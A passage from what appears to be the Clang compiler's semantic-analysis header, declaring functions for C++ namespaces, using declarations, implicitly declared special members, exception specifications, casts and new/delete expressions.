IER_Exists,
/// The symbol does not exist.
IER_DoesNotExist,
/// The name is a dependent name, so the results will differ
/// from one instantiation to the next.
IER_Dependent,
/// An error occurred.
IER_Error
};
IfExistsResult
CheckMicrosoftIfExistsSymbol(Scope *S, CXXScopeSpec &SS,
const DeclarationNameInfo &TargetNameInfo);
IfExistsResult
CheckMicrosoftIfExistsSymbol(Scope *S, SourceLocation KeywordLoc,
bool IsIfExists, CXXScopeSpec &SS,
UnqualifiedId &Name);
StmtResult BuildMSDependentExistsStmt(SourceLocation KeywordLoc,
bool IsIfExists,
NestedNameSpecifierLoc QualifierLoc,
DeclarationNameInfo NameInfo,
Stmt *Nested);
StmtResult ActOnMSDependentExistsStmt(SourceLocation KeywordLoc,
bool IsIfExists,
CXXScopeSpec &SS, UnqualifiedId &Name,
Stmt *Nested);
//===------------------------- "Block" Extension ------------------------===//
/// ActOnBlockStart - This callback is invoked when a block literal is
/// started.
void ActOnBlockStart(SourceLocation CaretLoc, Scope *CurScope);
/// ActOnBlockArguments - This callback allows processing of block arguments.
/// If there are no arguments, this is still invoked.
void ActOnBlockArguments(SourceLocation CaretLoc, Declarator &ParamInfo,
Scope *CurScope);
/// ActOnBlockError - If there is an error parsing a block, this callback
/// is invoked to pop the information about the block from the action impl.
void ActOnBlockError(SourceLocation CaretLoc, Scope *CurScope);
/// ActOnBlockStmtExpr - This is called when the body of a block statement
/// literal was successfully completed. ^(int x){...}
ExprResult ActOnBlockStmtExpr(SourceLocation CaretLoc, Stmt *Body,
Scope *CurScope);
//===---------------------------- Clang Extensions ----------------------===//
/// __builtin_convertvector(...)
ExprResult ActOnConvertVectorExpr(Expr *E, ParsedType ParsedDestTy,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
//===---------------------------- OpenCL Features -----------------------===//
/// __builtin_astype(...)
ExprResult ActOnAsTypeExpr(Expr *E, ParsedType ParsedDestTy,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
//===---------------------------- C++ Features --------------------------===//
// Act on C++ namespaces
Decl *ActOnStartNamespaceDef(Scope *S, SourceLocation InlineLoc,
SourceLocation NamespaceLoc,
SourceLocation IdentLoc, IdentifierInfo *Ident,
SourceLocation LBrace,
const ParsedAttributesView &AttrList,
UsingDirectiveDecl *&UsingDecl);
void ActOnFinishNamespaceDef(Decl *Dcl, SourceLocation RBrace);
NamespaceDecl *getStdNamespace() const;
NamespaceDecl *getOrCreateStdNamespace();
NamespaceDecl *lookupStdExperimentalNamespace();
CXXRecordDecl *getStdBadAlloc() const;
EnumDecl *getStdAlignValT() const;
private:
// A cache representing if we've fully checked the various comparison category
// types stored in ASTContext. The bit-index corresponds to the integer value
// of a ComparisonCategoryType enumerator.
llvm::SmallBitVector FullyCheckedComparisonCategories;
ValueDecl *tryLookupCtorInitMemberDecl(CXXRecordDecl *ClassDecl,
CXXScopeSpec &SS,
ParsedType TemplateTypeTy,
IdentifierInfo *MemberOrBase);
public:
enum class ComparisonCategoryUsage {
/// The '<=>' operator was used in an expression and a builtin operator
/// was selected.
OperatorInExpression,
/// A defaulted 'operator<=>' needed the comparison category. This
/// typically only applies to 'std::strong_ordering', due to the implicit
/// fallback return value.
DefaultedOperator,
};
/// Lookup the specified comparison category types in the standard
/// library, an check the VarDecls possibly returned by the operator<=>
/// builtins for that type.
///
/// \return The type of the comparison category type corresponding to the
/// specified Kind, or a null type if an error occurs
QualType CheckComparisonCategoryType(ComparisonCategoryType Kind,
SourceLocation Loc,
ComparisonCategoryUsage Usage);
/// Tests whether Ty is an instance of std::initializer_list and, if
/// it is and Element is not NULL, assigns the element type to Element.
bool isStdInitializerList(QualType Ty, QualType *Element);
/// Looks for the std::initializer_list template and instantiates it
/// with Element, or emits an error if it's not found.
///
/// \returns The instantiated template, or null on error.
QualType BuildStdInitializerList(QualType Element, SourceLocation Loc);
/// Determine whether Ctor is an initializer-list constructor, as
/// defined in [dcl.init.list]p2.
bool isInitListConstructor(const FunctionDecl *Ctor);
Decl *ActOnUsingDirective(Scope *CurScope, SourceLocation UsingLoc,
SourceLocation NamespcLoc, CXXScopeSpec &SS,
SourceLocation IdentLoc,
IdentifierInfo *NamespcName,
const ParsedAttributesView &AttrList);
void PushUsingDirective(Scope *S, UsingDirectiveDecl *UDir);
Decl *ActOnNamespaceAliasDef(Scope *CurScope,
SourceLocation NamespaceLoc,
SourceLocation AliasLoc,
IdentifierInfo *Alias,
CXXScopeSpec &SS,
SourceLocation IdentLoc,
IdentifierInfo *Ident);
void HideUsingShadowDecl(Scope *S, UsingShadowDecl *Shadow);
bool CheckUsingShadowDecl(UsingDecl *UD, NamedDecl *Target,
const LookupResult &PreviousDecls,
UsingShadowDecl *&PrevShadow);
UsingShadowDecl *BuildUsingShadowDecl(Scope *S, UsingDecl *UD,
NamedDecl *Target,
UsingShadowDecl *PrevDecl);
bool CheckUsingDeclRedeclaration(SourceLocation UsingLoc,
bool HasTypenameKeyword,
const CXXScopeSpec &SS,
SourceLocation NameLoc,
const LookupResult &Previous);
bool CheckUsingDeclQualifier(SourceLocation UsingLoc,
bool HasTypename,
const CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
SourceLocation NameLoc);
NamedDecl *BuildUsingDeclaration(
Scope *S, AccessSpecifier AS, SourceLocation UsingLoc,
bool HasTypenameKeyword, SourceLocation TypenameLoc, CXXScopeSpec &SS,
DeclarationNameInfo NameInfo, SourceLocation EllipsisLoc,
const ParsedAttributesView &AttrList, bool IsInstantiation);
NamedDecl *BuildUsingPackDecl(NamedDecl *InstantiatedFrom,
ArrayRef<NamedDecl *> Expansions);
bool CheckInheritingConstructorUsingDecl(UsingDecl *UD);
/// Given a derived-class using shadow declaration for a constructor and the
/// correspnding base class constructor, find or create the implicit
/// synthesized derived class constructor to use for this initialization.
CXXConstructorDecl *
findInheritingConstructor(SourceLocation Loc, CXXConstructorDecl *BaseCtor,
ConstructorUsingShadowDecl *DerivedShadow);
Decl *ActOnUsingDeclaration(Scope *CurScope, AccessSpecifier AS,
SourceLocation UsingLoc,
SourceLocation TypenameLoc, CXXScopeSpec &SS,
UnqualifiedId &Name, SourceLocation EllipsisLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnAliasDeclaration(Scope *CurScope, AccessSpecifier AS,
MultiTemplateParamsArg TemplateParams,
SourceLocation UsingLoc, UnqualifiedId &Name,
const ParsedAttributesView &AttrList,
TypeResult Type, Decl *DeclFromDeclSpec);
/// BuildCXXConstructExpr - Creates a complete call to a constructor,
/// including handling of its default argument expressions.
///
/// \param ConstructKind - a CXXConstructExpr::ConstructionKind
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
NamedDecl *FoundDecl,
CXXConstructorDecl *Constructor, MultiExprArg Exprs,
bool HadMultipleCandidates, bool IsListInitialization,
bool IsStdInitListInitialization,
bool RequiresZeroInit, unsigned ConstructKind,
SourceRange ParenRange);
/// Build a CXXConstructExpr whose constructor has already been resolved if
/// it denotes an inherited constructor.
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
CXXConstructorDecl *Constructor, bool Elidable,
MultiExprArg Exprs,
bool HadMultipleCandidates, bool IsListInitialization,
bool IsStdInitListInitialization,
bool RequiresZeroInit, unsigned ConstructKind,
SourceRange ParenRange);
// FIXME: Can we remove this and have the above BuildCXXConstructExpr check if
// the constructor can be elidable?
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
NamedDecl *FoundDecl,
CXXConstructorDecl *Constructor, bool Elidable,
MultiExprArg Exprs, bool HadMultipleCandidates,
bool IsListInitialization,
bool IsStdInitListInitialization, bool RequiresZeroInit,
unsigned ConstructKind, SourceRange ParenRange);
ExprResult BuildCXXDefaultInitExpr(SourceLocation Loc, FieldDecl *Field);
/// Instantiate or parse a C++ default argument expression as necessary.
/// Return true on error.
bool CheckCXXDefaultArgExpr(SourceLocation CallLoc, FunctionDecl *FD,
ParmVarDecl *Param);
/// BuildCXXDefaultArgExpr - Creates a CXXDefaultArgExpr, instantiating
/// the default expr if needed.
ExprResult BuildCXXDefaultArgExpr(SourceLocation CallLoc,
FunctionDecl *FD,
ParmVarDecl *Param);
/// FinalizeVarWithDestructor - Prepare for calling destructor on the
/// constructed variable.
void FinalizeVarWithDestructor(VarDecl *VD, const RecordType *DeclInitType);
/// Helper class that collects exception specifications for
/// implicitly-declared special member functions.
class ImplicitExceptionSpecification {
// Pointer to allow copying
Sema *Self;
// We order exception specifications thus:
// noexcept is the most restrictive, but is only used in C++11.
// throw() comes next.
// Then a throw(collected exceptions)
// Finally no specification, which is expressed as noexcept(false).
// throw(...) is used instead if any called function uses it.
ExceptionSpecificationType ComputedEST;
llvm::SmallPtrSet<CanQualType, 4> ExceptionsSeen;
SmallVector<QualType, 4> Exceptions;
void ClearExceptions() {
ExceptionsSeen.clear();
Exceptions.clear();
}
public:
explicit ImplicitExceptionSpecification(Sema &Self)
: Self(&Self), ComputedEST(EST_BasicNoexcept) {
if (!Self.getLangOpts().CPlusPlus11)
ComputedEST = EST_DynamicNone;
}
/// Get the computed exception specification type.
ExceptionSpecificationType getExceptionSpecType() const {
assert(!isComputedNoexcept(ComputedEST) &&
"noexcept(expr) should not be a possible result");
return ComputedEST;
}
/// The number of exceptions in the exception specification.
unsigned size() const { return Exceptions.size(); }
/// The set of exceptions in the exception specification.
const QualType *data() const { return Exceptions.data(); }
/// Integrate another called method into the collected data.
void CalledDecl(SourceLocation CallLoc, const CXXMethodDecl *Method);
/// Integrate an invoked expression into the collected data.
void CalledExpr(Expr *E) { CalledStmt(E); }
/// Integrate an invoked statement into the collected data.
void CalledStmt(Stmt *S);
/// Overwrite an EPI's exception specification with this
/// computed exception specification.
FunctionProtoType::ExceptionSpecInfo getExceptionSpec() const {
FunctionProtoType::ExceptionSpecInfo ESI;
ESI.Type = getExceptionSpecType();
if (ESI.Type == EST_Dynamic) {
ESI.Exceptions = Exceptions;
} else if (ESI.Type == EST_None) {
/// C++11 [except.spec]p14:
/// The exception-specification is noexcept(false) if the set of
/// potential exceptions of the special member function contains "any"
ESI.Type = EST_NoexceptFalse;
ESI.NoexceptExpr = Self->ActOnCXXBoolLiteral(SourceLocation(),
tok::kw_false).get();
}
return ESI;
}
};
/// Determine what sort of exception specification a defaulted
/// copy constructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedDefaultCtorExceptionSpec(SourceLocation Loc,
CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// default constructor of a class will have, and whether the parameter
/// will be const.
ImplicitExceptionSpecification
ComputeDefaultedCopyCtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// copy assignment operator of a class will have, and whether the
/// parameter will be const.
ImplicitExceptionSpecification
ComputeDefaultedCopyAssignmentExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted move
/// constructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedMoveCtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted move
/// assignment operator of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedMoveAssignmentExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// destructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedDtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification an inheriting
/// constructor of a class will have.
ImplicitExceptionSpecification
ComputeInheritingCtorExceptionSpec(SourceLocation Loc,
CXXConstructorDecl *CD);
/// Evaluate the implicit exception specification for a defaulted
/// special member function.
void EvaluateImplicitExceptionSpec(SourceLocation Loc, FunctionDecl *FD);
/// Check the given noexcept-specifier, convert its expression, and compute
/// the appropriate ExceptionSpecificationType.
ExprResult ActOnNoexceptSpec(SourceLocation NoexceptLoc, Expr *NoexceptExpr,
ExceptionSpecificationType &EST);
/// Check the given exception-specification and update the
/// exception specification information with the results.
void checkExceptionSpecification(bool IsTopLevel,
ExceptionSpecificationType EST,
ArrayRef<ParsedType> DynamicExceptions,
ArrayRef<SourceRange> DynamicExceptionRanges,
Expr *NoexceptExpr,
SmallVectorImpl<QualType> &Exceptions,
FunctionProtoType::ExceptionSpecInfo &ESI);
/// Determine if we're in a case where we need to (incorrectly) eagerly
/// parse an exception specification to work around a libstdc++ bug.
bool isLibstdcxxEagerExceptionSpecHack(const Declarator &D);
/// Add an exception-specification to the given member function
/// (or member function template). The exception-specification was parsed
/// after the method itself was declared.
void actOnDelayedExceptionSpecification(Decl *Method,
ExceptionSpecificationType EST,
SourceRange SpecificationRange,
ArrayRef<ParsedType> DynamicExceptions,
ArrayRef<SourceRange> DynamicExceptionRanges,
Expr *NoexceptExpr);
class InheritedConstructorInfo;
/// Determine if a special member function should have a deleted
/// definition when it is defaulted.
bool ShouldDeleteSpecialMember(CXXMethodDecl *MD, CXXSpecialMember CSM,
InheritedConstructorInfo *ICI = nullptr,
bool Diagnose = false);
/// Produce notes explaining why a defaulted function was defined as deleted.
void DiagnoseDeletedDefaultedFunction(FunctionDecl *FD);
/// Declare the implicit default constructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// default constructor will be added.
///
/// \returns The implicitly-declared default constructor.
CXXConstructorDecl *DeclareImplicitDefaultConstructor(
CXXRecordDecl *ClassDecl);
/// DefineImplicitDefaultConstructor - Checks for feasibility of
/// defining this constructor as the default constructor.
void DefineImplicitDefaultConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit destructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// destructor will be added.
///
/// \returns The implicitly-declared destructor.
CXXDestructorDecl *DeclareImplicitDestructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitDestructor - Checks for feasibility of
/// defining this destructor as the default destructor.
void DefineImplicitDestructor(SourceLocation CurrentLocation,
CXXDestructorDecl *Destructor);
/// Build an exception spec for destructors that don't have one.
///
/// C++11 says that user-defined destructors with no exception spec get one
/// that looks as if the destructor was implicitly declared.
void AdjustDestructorExceptionSpec(CXXDestructorDecl *Destructor);
/// Define the specified inheriting constructor.
void DefineInheritingConstructor(SourceLocation UseLoc,
CXXConstructorDecl *Constructor);
/// Declare the implicit copy constructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// copy constructor will be added.
///
/// \returns The implicitly-declared copy constructor.
CXXConstructorDecl *DeclareImplicitCopyConstructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitCopyConstructor - Checks for feasibility of
/// defining this constructor as the copy constructor.
void DefineImplicitCopyConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit move constructor for the given class.
///
/// \param ClassDecl The Class declaration into which the implicit
/// move constructor will be added.
///
/// \returns The implicitly-declared move constructor, or NULL if it wasn't
/// declared.
CXXConstructorDecl *DeclareImplicitMoveConstructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitMoveConstructor - Checks for feasibility of
/// defining this constructor as the move constructor.
void DefineImplicitMoveConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit copy assignment operator for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// copy assignment operator will be added.
///
/// \returns The implicitly-declared copy assignment operator.
CXXMethodDecl *DeclareImplicitCopyAssignment(CXXRecordDecl *ClassDecl);
/// Defines an implicitly-declared copy assignment operator.
void DefineImplicitCopyAssignment(SourceLocation CurrentLocation,
CXXMethodDecl *MethodDecl);
/// Declare the implicit move assignment operator for the given class.
///
/// \param ClassDecl The Class declaration into which the implicit
/// move assignment operator will be added.
///
/// \returns The implicitly-declared move assignment operator, or NULL if it
/// wasn't declared.
CXXMethodDecl *DeclareImplicitMoveAssignment(CXXRecordDecl *ClassDecl);
/// Defines an implicitly-declared move assignment operator.
void DefineImplicitMoveAssignment(SourceLocation CurrentLocation,
CXXMethodDecl *MethodDecl);
/// Force the declaration of any implicitly-declared members of this
/// class.
void ForceDeclarationOfImplicitMembers(CXXRecordDecl *Class);
/// Check a completed declaration of an implicit special member.
void CheckImplicitSpecialMemberDeclaration(Scope *S, FunctionDecl *FD);
/// Determine whether the given function is an implicitly-deleted
/// special member function.
bool isImplicitlyDeleted(FunctionDecl *FD);
/// Check whether 'this' shows up in the type of a static member
/// function after the (naturally empty) cv-qualifier-seq would be.
///
/// \returns true if an error occurred.
bool checkThisInStaticMemberFunctionType(CXXMethodDecl *Method);
/// Whether this' shows up in the exception specification of a static
/// member function.
bool checkThisInStaticMemberFunctionExceptionSpec(CXXMethodDecl *Method);
/// Check whether 'this' shows up in the attributes of the given
/// static member function.
///
/// \returns true if an error occurred.
bool checkThisInStaticMemberFunctionAttributes(CXXMethodDecl *Method);
/// MaybeBindToTemporary - If the passed in expression has a record type with
/// a non-trivial destructor, this will return CXXBindTemporaryExpr. Otherwise
/// it simply returns the passed in expression.
ExprResult MaybeBindToTemporary(Expr *E);
/// Wrap the expression in a ConstantExpr if it is a potential immediate
/// invocation.
ExprResult CheckForImmediateInvocation(ExprResult E, FunctionDecl *Decl);
bool CompleteConstructorCall(CXXConstructorDecl *Constructor,
MultiExprArg ArgsPtr,
SourceLocation Loc,
SmallVectorImpl<Expr*> &ConvertedArgs,
bool AllowExplicit = false,
bool IsListInitialization = false);
ParsedType getInheritingConstructorName(CXXScopeSpec &SS,
SourceLocation NameLoc,
IdentifierInfo &Name);
ParsedType getConstructorName(IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec &SS,
bool EnteringContext);
ParsedType getDestructorName(SourceLocation TildeLoc,
IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec &SS,
ParsedType ObjectType,
bool EnteringContext);
ParsedType getDestructorTypeForDecltype(const DeclSpec &DS,
ParsedType ObjectType);
// Checks that reinterpret casts don't have undefined behavior.
void CheckCompatibleReinterpretCast(QualType SrcType, QualType DestType,
bool IsDereference, SourceRange Range);
/// ActOnCXXNamedCast - Parse {dynamic,static,reinterpret,const}_cast's.
ExprResult ActOnCXXNamedCast(SourceLocation OpLoc,
tok::TokenKind Kind,
SourceLocation LAngleBracketLoc,
Declarator &D,
SourceLocation RAngleBracketLoc,
SourceLocation LParenLoc,
Expr *E,
SourceLocation RParenLoc);
ExprResult BuildCXXNamedCast(SourceLocation OpLoc,
tok::TokenKind Kind,
TypeSourceInfo *Ty,
Expr *E,
SourceRange AngleBrackets,
SourceRange Parens);
ExprResult ActOnBuiltinBitCastExpr(SourceLocation KWLoc, Declarator &Dcl,
ExprResult Operand,
SourceLocation RParenLoc);
ExprResult BuildBuiltinBitCastExpr(SourceLocation KWLoc, TypeSourceInfo *TSI,
Expr *Operand, SourceLocation RParenLoc);
ExprResult BuildCXXTypeId(QualType TypeInfoType,
SourceLocation TypeidLoc,
TypeSourceInfo *Operand,
SourceLocation RParenLoc);
ExprResult BuildCXXTypeId(QualType TypeInfoType,
SourceLocation TypeidLoc,
Expr *Operand,
SourceLocation RParenLoc);
/// ActOnCXXTypeid - Parse typeid( something ).
ExprResult ActOnCXXTypeid(SourceLocation OpLoc,
SourceLocation LParenLoc, bool isType,
void *TyOrExpr,
SourceLocation RParenLoc);
ExprResult BuildCXXUuidof(QualType TypeInfoType,
SourceLocation TypeidLoc,
TypeSourceInfo *Operand,
SourceLocation RParenLoc);
ExprResult BuildCXXUuidof(QualType TypeInfoType,
SourceLocation TypeidLoc,
Expr *Operand,
SourceLocation RParenLoc);
/// ActOnCXXUuidof - Parse __uuidof( something ).
ExprResult ActOnCXXUuidof(SourceLocation OpLoc,
SourceLocation LParenLoc, bool isType,
void *TyOrExpr,
SourceLocation RParenLoc);
/// Handle a C++1z fold-expression: ( expr op ... op expr ).
ExprResult ActOnCXXFoldExpr(SourceLocation LParenLoc, Expr *LHS,
tok::TokenKind Operator,
SourceLocation EllipsisLoc, Expr *RHS,
SourceLocation RParenLoc);
ExprResult BuildCXXFoldExpr(SourceLocation LParenLoc, Expr *LHS,
BinaryOperatorKind Operator,
SourceLocation EllipsisLoc, Expr *RHS,
SourceLocation RParenLoc,
Optional<unsigned> NumExpansions);
ExprResult BuildEmptyCXXFoldExpr(SourceLocation EllipsisLoc,
BinaryOperatorKind Operator);
//// ActOnCXXThis - Parse 'this' pointer.
ExprResult ActOnCXXThis(SourceLocation loc);
/// Build a CXXThisExpr and mark it referenced in the current context.
Expr *BuildCXXThisExpr(SourceLocation Loc, QualType Type, bool IsImplicit);
void MarkThisReferenced(CXXThisExpr *This);
/// Try to retrieve the type of the 'this' pointer.
///
/// \returns The type of 'this', if possible. Otherwise, returns a NULL type.
QualType getCurrentThisType();
/// When non-NULL, the C++ 'this' expression is allowed despite the
/// current context not being a non-static member function. In such cases,
/// this provides the type used for 'this'.
QualType CXXThisTypeOverride;
/// RAII object used to temporarily allow the C++ 'this' expression
/// to be used, with the given qualifiers on the current class type.
class CXXThisScopeRAII {
Sema &S;
QualType OldCXXThisTypeOverride;
bool Enabled;
public:
/// Introduce a new scope where 'this' may be allowed (when enabled),
/// using the given declaration (which is either a class template or a
/// class) along with the given qualifiers.
/// along with the qualifiers placed on '*this'.
CXXThisScopeRAII(Sema &S, Decl *ContextDecl, Qualifiers CXXThisTypeQuals,
bool Enabled = true);
~CXXThisScopeRAII();
};
/// Make sure the value of 'this' is actually available in the current
/// context, if it is a potentially evaluated context.
///
/// \param Loc The location at which the capture of 'this' occurs.
///
/// \param Explicit Whether 'this' is explicitly captured in a lambda
/// capture list.
///
/// \param FunctionScopeIndexToStopAt If non-null, it points to the index
/// of the FunctionScopeInfo stack beyond which we do not attempt to capture.
/// This is useful when enclosing lambdas must speculatively capture
/// 'this' that may or may not be used in certain specializations of
/// a nested generic lambda (depending on whether the name resolves to
/// a non-static member function or a static function).
/// \return returns 'true' if failed, 'false' if success.
bool CheckCXXThisCapture(SourceLocation Loc, bool Explicit = false,
bool BuildAndDiagnose = true,
const unsigned *const FunctionScopeIndexToStopAt = nullptr,
bool ByCopy = false);
/// Determine whether the given type is the type of *this that is used
/// outside of the body of a member function for a type that is currently
/// being defined.
bool isThisOutsideMemberFunctionBody(QualType BaseType);
/// ActOnCXXBoolLiteral - Parse {true,false} literals.
ExprResult ActOnCXXBoolLiteral(SourceLocation OpLoc, tok::TokenKind Kind);
/// ActOnObjCBoolLiteral - Parse {__objc_yes,__objc_no} literals.
ExprResult ActOnObjCBoolLiteral(SourceLocation OpLoc, tok::TokenKind Kind);
ExprResult
ActOnObjCAvailabilityCheckExpr(llvm::ArrayRef<AvailabilitySpec> AvailSpecs,
SourceLocation AtLoc, SourceLocation RParen);
/// ActOnCXXNullPtrLiteral - Parse 'nullptr'.
ExprResult ActOnCXXNullPtrLiteral(SourceLocation Loc);
//// ActOnCXXThrow - Parse throw expressions.
ExprResult ActOnCXXThrow(Scope *S, SourceLocation OpLoc, Expr *expr);
ExprResult BuildCXXThrow(SourceLocation OpLoc, Expr *Ex,
bool IsThrownVarInScope);
bool CheckCXXThrowOperand(SourceLocation ThrowLoc, QualType ThrowTy, Expr *E);
/// ActOnCXXTypeConstructExpr - Parse construction of a specified type.
/// Can be interpreted either as function-style casting ("int(x)")
/// or class type construction ("ClassType(x,y,z)")
/// or creation of a value-initialized type ("int()").
ExprResult ActOnCXXTypeConstructExpr(ParsedType TypeRep,
SourceLocation LParenOrBraceLoc,
MultiExprArg Exprs,
SourceLocation RParenOrBraceLoc,
bool ListInitialization);
ExprResult BuildCXXTypeConstructExpr(TypeSourceInfo *Type,
SourceLocation LParenLoc,
MultiExprArg Exprs,
SourceLocation RParenLoc,
bool ListInitialization);
/// ActOnCXXNew - Parsed a C++ 'new' expression.
ExprResult ActOnCXXNew(SourceLocation StartLoc, bool UseGlobal,
SourceLocation PlacementLParen,
MultiExprArg PlacementArgs,
SourceLocation PlacementRParen,
SourceRange TypeIdParens, Declarator &D,
Expr *Initializer);
ExprResult BuildCXXNew(SourceRange Range, bool UseGlobal,
SourceLocation PlacementLParen,
MultiExprArg PlacementArgs,
SourceLocation PlacementRParen,
SourceRange TypeIdParens,
QualType AllocType,
TypeSourceInfo *AllocTypeInfo,
Optional<Expr *> ArraySize,
SourceRange DirectInitRange,
Expr *Initializer);
/// Determine whether \p FD is an aligned allocation or deallocation
/// function that is unavailable.
bool isUnavailableAlignedAllocationFunction(const FunctionDecl &FD) const;
/// Produce diagnostics if \p FD is an aligned allocation or deallocation
/// function that is unavailable.
void diagnoseUnavailableAlignedAllocation(const FunctionDecl &FD,
SourceLocation Loc);
bool CheckAllocatedType(QualType AllocType, SourceLocation Loc,
SourceRange R);
/// The scope in which to find allocation functions.
enum AllocationFunctionScope {
/// Only look for allocation functions in the global scope.
AFS_Global,
/// Only look for allocation functions in the scope of the
/// allocated class.
AFS_Class,
/// Look for allocation functions in both the global scope
/// and in the scope of the allocated class.
AFS_Both
};
/// Finds the overloads of operator new and delete that are appropriate
/// for the allocation.
bool FindAllocationFunctions(SourceLocation StartLoc, SourceRange Range,
AllocationFunctionScope NewScope,
AllocationFunctionScope DeleteScope,
QualType AllocType, bool IsArray,
bool &PassAlignment, MultiExprArg PlaceArgs,
FunctionDecl *&OperatorNew,
FunctionDecl *&OperatorDelete,
bool Diagnose = true);
void DeclareGlobalNewDelete();
void DeclareGlobalAllocationFunction(DeclarationName Name, QualType Return,
ArrayRef<QualType> Params);
bool FindDeallocationFunction(SourceLocation StartLoc, CXXRecordDecl *RD,
DeclarationName Name, FunctionDecl* &Operator,
bool Diagnose = true);
FunctionDecl *FindUsualDeallocationFunction(SourceLocation StartLoc,
bool CanProvideSize,
bool Overaligned,
DeclarationName Name);
FunctionDecl *FindDeallocationFunctionForDestructor(SourceLocation StartLoc,
CXXRecordDecl *RD);
/// ActOnCXXDelete - Parsed a C++ 'delete' expression
ExprResult ActOnCXXDelete(SourceLocation StartLoc,
bool UseGlobal, bool ArrayForm,
Expr *Operand);
void CheckVirtualDtorCall(CXXDestructorDecl *dtor, SourceLocation Loc,
bool IsDelete, bool CallCanBeVirtual,
bool WarnOnNonAbstractTypes,
SourceLocation DtorLoc);
ExprResult ActOnNoexceptExpr(SourceLocation KeyLoc, SourceLocation LParen,
Expr *Operand, SourceLocation RParen);
ExprResult BuildCXXNoexceptExpr(SourceLocation KeyLoc, Expr *Operand,
SourceLocation RParen);
/// Parsed one of the type trait support pseudo-functions.
ExprResult ActOnTypeTrait(TypeTrait Kind, SourceLocation KWLoc,
ArrayRef<ParsedType> Args,
SourceLocation RParenLoc);
ExprResult BuildTypeTrait(TypeTrait Kind, SourceLocation KWLoc,
ArrayRef<TypeSourceInfo *> Args,
SourceLocation RParenLoc);
/// ActOnArrayTypeTrait - Parsed one of the binary type trait support
/// pseudo-functions.
ExprResult ActOnArrayTypeTrait(ArrayTypeTrait ATT,
SourceLocation KWLoc,
ParsedType LhsTy,
Expr *DimExpr,
SourceLocation RParen);
ExprResult BuildArrayTypeTrait(ArrayTypeTrait ATT,
SourceLocation KWLoc,
TypeSourceInfo *TSInfo,
Expr *DimExpr,
SourceLocation RParen);
/// ActOnExpressionTrait - Parsed one of the unary type trait support
/// pseudo-functions.
ExprResult ActOnExpressionTrait(ExpressionTrait OET,
SourceLocation KWLoc,
Expr *Queried,
SourceLocation RParen);
ExprResult BuildExpressionTrait(ExpressionTrait OET,
SourceLocation KWLoc,
Expr *Queried,
SourceLocation RParen);
ExprResult ActOnStartCXXMemberReference(Scope *S,
Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
ParsedType &ObjectType,
bool &MayBePseudoDestructor);
ExprResult BuildPseudoDestructorExpr(Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
const CXXScopeSpec &SS,
TypeSourceInfo *ScopeType,
SourceLocation CCLoc,
SourceLocation TildeLoc,
PseudoDestructorTypeStorage DestroyedType);
ExprResult ActOnPseudoDestructorExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
CXXScopeSpec &SS,
UnqualifiedId &FirstTypeName,
SourceLocation CCLoc,
SourceLocation TildeLoc,
UnqualifiedId &SecondTypeName);
ExprResult ActOnPseudoDestructorExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
SourceLocation TildeLoc,
const DeclSpec& DS);
/// MaybeCreateExprWithCleanups - If the current full-expression
/// requires any cleanups, surround it with a ExprWithCleanups node.
/// Otherwise, just returns the passed-in expression.
Expr *MaybeCreateExprWithCleanups(Expr *SubExpr);
Stmt *MaybeCreateStmtWithCleanups(Stmt *SubStmt);
ExprResult MaybeCreateExprWithCleanups(ExprResult SubExpr);
MaterializeTemporaryExpr *
CreateMaterializeTemporaryExpr(QualType T, Expr *Temporary,
bool BoundToLvalueReference);
ExprResult ActOnFinishFullExpr(Expr *Expr, bool DiscardedValue) {
return ActOnFinishFullExpr(
Expr, Expr ? Expr->getExprLoc() : SourceLocation(), DiscardedValue);
}
ExprResult ActOnFinishFullExpr(Expr *Expr, SourceLocation CC,
bool DiscardedValue, bool IsConstexpr = false);
StmtResult ActOnFinishFullStmt(Stmt *Stmt);
// Marks SS invalid if it represents an incomplete type.
bool RequireCompleteDeclContext(CXXScopeSpec &SS, DeclContext *DC);
DeclContext *computeDeclContext(QualType T);
DeclContext *computeDeclContext(const CXXScopeSpec &SS,
bool EnteringContext = false);
bool isDependentScopeSpecifier(const CXXScopeSpec &SS);
CXXRecordDecl *getCurrentInstantiationOf(NestedNameSpecifier *NNS);
/// The parser has parsed a global nested-name-specifier '::'.
///
/// \param CCLoc The location of the '::'.
///
/// \param SS The nested-name-specifier, which will be updated in-place
/// to reflect the parsed nested-name-specifier.
///
/// \returns true if an error occurred, false otherwise.
